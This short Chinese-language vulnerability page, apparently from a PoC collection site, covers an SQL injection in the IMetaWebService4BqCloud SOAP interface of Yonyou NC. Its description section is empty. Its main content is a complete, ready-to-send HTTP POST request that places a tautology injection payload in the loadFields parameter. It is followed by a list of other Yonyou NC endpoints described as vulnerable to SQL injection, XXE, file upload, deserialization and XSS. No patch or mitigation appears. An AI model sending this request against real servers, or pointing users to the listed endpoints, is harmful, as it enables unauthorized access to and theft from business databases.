用友NC IMetaWebService4BqCloud 接口存在SQL注入漏洞

漏洞描述

PoC代码

POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 310
Content-Type: text/xml
Soapaction: urn:loadFields
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud"><soapenv:Header/><soapenv:Body><imet:loadFields><!--Optional:--><imet:string>SmartModel^2'+or+1%3d%3d1+--</imet:string></imet:loadFields></soapenv:Body></soapenv:Envelope>

相关漏洞推荐

• 用友NC及NC Cloud系统 /uapws/service/nc.itf.bap.service.IBapIOService getBapTableDatas SQL 注入漏洞
• 用友NC /portal/pt/portalcombo/importCombo XML 外部实体注入漏洞
• 用友NC存在 oncelogin/getAuth SQL注入漏洞
• 用友NC /portal/pt/oacoSchedulerEvents/uncancelEvent SQL 注入漏洞
• 用友NC /ebvp/register/qrySubPurchaseOrgByParentPk SQL 注入漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• 用友NC /portal/pt/infopathimport/importExcelTemplate pageId 文件上传漏洞
• 用友NC OAUserQryServlet 反序列化漏洞
• 用友NC OAUserAuthenticationServlet 反序列化漏洞
• 用友NC ContactsQueryServiceServlet 反序列化漏洞
• POC 用友NC UserSynchronizationServlet 反序列化漏洞
• 用友NC ContactsFuzzySearchServlet 反序列化漏洞
• 用友 NC /portal/pt/nc5x/fwd 存在跨站点脚本攻击漏洞